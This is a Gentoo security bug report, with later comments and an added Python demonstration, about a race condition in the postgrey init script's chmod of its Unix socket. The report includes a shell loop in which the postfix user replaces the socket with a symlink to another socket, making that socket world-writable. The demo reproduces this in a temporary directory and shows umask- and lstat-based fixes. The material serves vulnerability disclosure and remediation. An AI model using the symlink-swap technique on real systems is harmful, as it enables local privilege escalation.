
Bug 603258

Summary: mail-filter/postgrey: root privilege escalation via init script race condition
Product: Gentoo Security
Reporter: Michael Orlitzky <mjo>
Component: Auditing
Assignee: Gentoo Security <security>
Status: CONFIRMED
Severity: normal
CC: andreis.vinogradovs, kfm, lists, net-mail+disabled, proxy-maint, sam
Priority: Normal
Version: unspecified
Hardware: All
OS: Linux
Package list:
Runtime testing required: ---

Description Michael Orlitzky gentoo-dev 2016-12-20 22:10:34 UTC
If you set POSTGREY_TYPE="unix" in the conf.d file for postgrey, then the socket it uses is located at,


However, that directory will be owned by the "postfix" user, and not by root. The init script for postgrey trusts the contents of that directory:

  # HACK -- start a subshell and corrects perms on the socket...
  if [ "x${POSTGREY_TYPE}" = "xunix" ]; then
      rm -f ${POSTGREY_SOCKET}
      ( while ! test -S ${POSTGREY_SOCKET}; \
          do sleep 1; \
        done; \
        chmod a+rw,a-x ${POSTGREY_SOCKET} ) &
  fi

It's not a big window, but there is one between the "-S" test and the call to chmod, and that creates a race condition. The "postfix" user can replace the "postgrey" socket with a symlink to any file on the system, and the call to chmod will make the target of the symlink world-writable. I was able to exploit that by brute force (a while-loop that overwrites the postgrey socket with a symlink) but not reliably.

A more reliable attack is to create a symlink that points to another socket, so that the "-S" test succeeds and you don't need to time it just right. For example, as the postfix user in /var/spool/postfix/private,

  rm -f postgrey; \
  while [ ! -S postgrey ]; do : ; done; \
  ln -sf /var/run/ntpd.sock ./postgrey;

will (reliably) cause the init script to make your ntpd socket world-writable.
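The two points in the report above (that `test -S` and `chmod` both follow symlinks, and that a symlink to some other socket satisfies the `-S` test without any timing) can be reproduced in a throwaway directory. The following is an added example written for this page; it is not code from the bug, from the Gentoo init script or from postgrey. It builds a constructed stand-in for `/var/run/ntpd.sock` (a real Unix socket, mode 0600) and a constructed stand-in for `/var/spool/postfix/private` containing the attacker's symlink, runs the init script's check-then-chmod logic against it, and then shows two alternatives: an `lstat`-based check that rejects the symlink (which only narrows the window), and creating the socket with the wanted mode at `bind()` time via `umask`, so no fix-up `chmod` on a path inside someone else's directory is needed at all. It assumes Linux socket-file semantics (the socket file is created with mode `0777 & ~umask`); the function and file names are this example's own.

```python
import os
import socket
import stat
import tempfile


def init_script_fixup(sock_path, mode=0o666):
    """The init script's logic, transcribed: `test -S` is a stat() and follows
    symlinks; chmod also follows symlinks, so it lands on the link target."""
    if not stat.S_ISSOCK(os.stat(sock_path).st_mode):
        return False
    os.chmod(sock_path, mode)
    return True


def is_plain_socket(sock_path):
    """lstat-based check: a symlink is rejected even when its target is a socket.
    This narrows the window but does not close it; a symlink can still be
    swapped in between this check and any chmod that follows it."""
    st = os.lstat(sock_path)
    return stat.S_ISSOCK(st.st_mode) and not stat.S_ISLNK(st.st_mode)


def create_socket_with_mode(sock_path, mode=0o666):
    """Create the socket with the wanted permissions at bind() time by setting
    umask, so there is no post-hoc chmod step to race against."""
    old_umask = os.umask(0o777 & ~mode)
    try:
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(sock_path)
    finally:
        os.umask(old_umask)
    return s


def demo():
    """Run the scenario in a temporary directory; returns the observed modes."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for /var/run/ntpd.sock: a real socket, mode 0600.
        victim = os.path.join(tmp, "victim.sock")
        victim_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        victim_sock.bind(victim)
        os.chmod(victim, 0o600)
        results["victim_mode_before"] = stat.S_IMODE(os.stat(victim).st_mode)

        # Constructed stand-in for /var/spool/postfix/private, where the
        # "postfix" user has planted a symlink named postgrey -> victim socket.
        private = os.path.join(tmp, "private")
        os.mkdir(private)
        link = os.path.join(private, "postgrey")
        os.symlink(victim, link)

        # The init script's test -S + chmod: the check passes through the
        # symlink (its target is a socket) and the chmod hits the victim.
        results["fixup_ran"] = init_script_fixup(link)
        results["victim_mode_after"] = stat.S_IMODE(os.stat(victim).st_mode)

        # The lstat-based check sees the symlink itself and refuses.
        results["lstat_rejects_symlink"] = not is_plain_socket(link)

        # Creating the socket under the right umask: correct mode, no fix-up.
        os.unlink(link)
        created = create_socket_with_mode(link)
        results["safe_mode"] = stat.S_IMODE(os.lstat(link).st_mode)
        results["safe_is_socket"] = is_plain_socket(link)
        created.close()
        victim_sock.close()
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, oct(value) if isinstance(value, int) and not isinstance(value, bool) else value)
```

Running `demo()` shows the victim socket going from 0600 to 0666 through the symlink, which is exactly the chmod a+rw,a-x outcome described above, with no timing involved. The `umask` variant is the shape of fix a practitioner would want: permissions are decided by the process that creates the socket, and the init script never has to modify anything under a directory owned by another user.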
Comment 1 Michael Orlitzky gentoo-dev 2019-09-14 16:10:05 UTC
Coming up on a third birthday... is anyone still maintaining postgrey?
Comment 2 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:16:24 UTC
Unrestricting and reassigning to security@ per bug #705894
Comment 3 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:18:40 UTC
unrestricting per bug 705894
Comment 4 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2020-05-21 22:43:37 UTC
@stefan, are you there? Any thoughts on this?
Comment 5 John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2021-01-05 21:43:12 UTC